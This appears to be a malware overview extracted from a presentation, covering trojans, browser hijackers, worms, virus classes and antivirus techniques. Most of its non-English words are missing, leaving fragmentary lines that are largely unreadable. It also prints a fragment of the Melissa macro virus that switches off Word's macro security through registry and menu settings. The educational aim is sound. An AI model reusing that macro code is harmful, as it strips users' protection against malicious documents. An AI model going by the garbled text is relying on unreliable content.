,
.
1.
2.
3.
4. ()
5.
. .
Trojan Horses
Boot
Infectors
Browser
Hijackers
System
Infectors
Viruses
Back Door
Worms
Port Scanners
File
Infectors
Transient
Viruses
Resident
Viruses
Macro
Viruses
Polymorphic Viruses
Shell
Replacement
Viruses
Intrusive
Overwriting
Viruses
Add On NonOverwriting
Viruses
Trojan Horse
(Trojan Trojan Horse
),
,
.
Ken Thomson,
1983, login UNIX
.
Trojans
1) ()
.
2)
,
.
Trojans
1)
2)
3)
4)
5)
6)
7)
8)
9)
/.
e-mail.
antivirus
DOS Attacks
Proxy Zombies.
1)
2)
3)
4)
OS Services
Keygens & Cracks
Road Apples
e-mails &
attachements
5)
websites.
6) chat rooms
(IRC, Java DCC).
7) Port scanning.
NetBUS
Sub7
Dolly
Deep Throat
Back Orifice
Beast
---------------------------1) Keystroke
Logging
().
2) Screen Captures
3) Program
Launching
4) File Browsing
5) Shut Down
6) Open/Close CD.
7)
.
8) .
9) PC.
10) HDD Format.
Fakeneflick
GGTracker
Nickispy
---------------------------1) Android.
2)
.
3) SMS,
MMS, e-mails
.
4)
.
5)
.
6)
Blue Tooth.
IP
Port
Scanning
BT,
utilities ( H).
client server.
Dolly,
Internet
( MODEM)
Browser Hijackers -
Browser Hijackers,
,
(Browser) ( Explorer, Mozilla, Opera ).
Browser Hijackers,
Browser,
, .
Trojans, bundles
.
Hijackers
1.
2.
3.
4.
5.
6.
7.
8.
OneWebSearch
Conduit Toolbar
CoolWebSearch
Omiga-Plus
Qvo6.com
Qone8.com
Snap.do
Babylon Toolbar
Hijackers
1. Force Hits.
2. Trojans.
3.
.
4.
( spyware removals).
,
,
.
Babylon Toolbar,
.
Babylon
Translation Software,
bundle
free downloads.
browser
search engine
.
2011,
CNET
www.download.com
.
CNET,
Sean
Murphy,
.
search engine
.
iExplorer,
Mozilla, Safari Chrome.
search engine
.
Ports,
Network Worms
Worms,
.
,
( ,
),
,
.
Worms ,
.
Worms, OSI L2
(Data Link Layer ),
.
Worms
MyDoom. (W32.MyDoom@@mm).
Windows.
2004.
andy; Im just doing my job, nothing personal, sorry
payload 38.000.000 $,
Internet 10%,
Servers 50%, sites.
Sobig.F
2003 37.000.000$,
mail servers
internet gateways .
Internet
50%.
10 .
2003 ,
.
ILOVEYOU (Love-Letter).
4/2/2000 50 .
, 15 . $.
attachment Love-Letter-For-You.TXT.VBS,
.VBS .
Melissa Worm
David L. Smith.
Smith, Worm,
Melissa.
Smith FBI 10
( 20 5.000$
).
Melissa 20% .
,
1,9 . $,
Internet Servers.
O Melissa VB Script Word.
On Error Resume Next
If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Melissa, Office
Office VBA
- Viruses
,
"" .
,
, .
,
.
, (Viruses)
.
antivirus.
Viruses
Boot
Infectors
System
Infectors
File
Infectors
Transient
Viruses
Resident
Viruses
Macro
Viruses
Polymorphic Viruses
Shell
Replacement
Viruses
Intrusive
Overwriting
Viruses
Add On NonOverwriting
Viruses
(
)
.
Boot Infectors
(HD, CD, FD, USB Stick ..)
Firmware , Boot Record, Boot Sector.
Boot Record, .
Boot Record, Boot
Infector, Boot Record Virus.
Boot Infectors, MBR (Master Boot
Record) VBR (Volume Boot Record), ,
.
Boot Infector,
Boot Record,
,
(, , USB Sticks)
.
.
(c) Brain
Brain, 1986
Farooq Alvi Boot Infector.
DOS (Floppy Disks).
7 kb RAM .
(
).
Welcome to the Dungeon
, .
Brain
.
Alvi,
Brain NET ISP Brain
Telecommunication Ltd.
System Infectors
System Infectors,
.
MSDOS.SYS IO.SYS, MS-DOS.
System Infectors :
Folder Infectors
Folder Infectors, System
Infectors Boot Infectors,
,
, (.).
( USB Sticks)
,
( Format).
USB Stick
autorun.inf
Service atieclxx.exe
ATI
chipsets.
Overwriting
System
Infectors.
,
ATI Chipset,
99% .
csrss,
.
Services, owner,
,
.
File Infectors
System Infectors, File Infectors,
,
.
File Infectors,
.
File Infectors :
.EXE .COM
.LIB .DLL
.
.
Add On (Non-Overwriting) Virus
Jump
1
Jump
Add On Virus
1.
,
.
2. Jump
.
3. Jump
.
4.
.
( ),
(
).
Transient Viruses.
.
.
, .
Resident Viruses.
,
.
Video RAM,
, services (
owner ), (
).
Trojan Horses
Viruses
Worms
, UNIX ( Internet)
, MULTIUSER .
SOFTWARE
()
ROOT ACCESS
o
o /
o
o ,
/ /
MACRO (JAVA, JAVA-SCRIPT, VB)
C/C++,
ASSEMBLY,
*., *.COM
*.DOC, *.XLS, *.HTML, *.MDB, *.PPT
LIBRARYS COMPILERS (*.LIB, *.DLL)
DOS (*.) (ANSI BOMBS)
e-MAILS ATACHMENTS
, ,
, .
.
S/W
HOUSE .
DOWNLOAD O WEB-SITE.
.
SHAREWARE .
.
HARDWARE
SOFTWARE
(WARM BOOTS)
( ,
VIDEO RAM)
ANTIVIRUS
Antivirus ,
, ,
.
antivirus , antivirus,
Trojans, Worms, Backdoors, Browser Hijackers
.
,
(File Infectors), (Worms ).
antivirus :
NOD 32
Avast!
Norton Antivirus
AVG
F-Secure
Kaspersky
Panda Antivirus
Bit Defender
McAffee
Signature Based Detection
,
.
antivirus ,
.
.
antivirus
,
.
,
, antivirus.
.
,
,
( a/v).
Freezer
Blaster
Heuristic scanning
( ).
,
.
,
, ,
,
.
antivirus ,
.
Heuristic Scanning Vundo Trojan,
popups , Google
Facebook,
.
ANTIVIRUS
ANTIVIRUS SOFTWARE
INTEGRITY
CHECKING
MEMMORY
RESIDENT A/V
SIGNATURE
CHECKING
HEURISTIC
SCANNING
Antivirus
antivirus ,
( ).
antivirus,
Shell Overwriting Viruses
Vault.
.
non-Overwriting
Viruses, 100% .
,
.
, ROM-Flash
BIOS,
CMOS. antivirus,
,
.
Antivirus
antivirus
.
,
, antivirus,
,
.
, ,
antivirus,
.
False Positives
antivirus
,
,
.
keygens cracks
(
).
: cracks & keygens
( Trojans).
(Format)
(
) , Format.
(Full) (Quick) Format,
.
A/V S/W
:
1.
2.
3.
HEURISTIC
SCANING.
INTEGRITY CHECKING
4.
BACKUP
5.
6.
A/V S/W. ( ,
)
7.
A/V S/W (
2 ).
READ-ONLY
SERVER.
LOGIN SCRIPTS.
.
.
EPROM CHIPS.
FIREWALLS .
ADMINISTRATOR
.
SUPERVISORY
PRIVILEDGES, .
PASSWORDS.
INTERNET
,
BACK DOOR
INTERNET
O 1.000.000!!!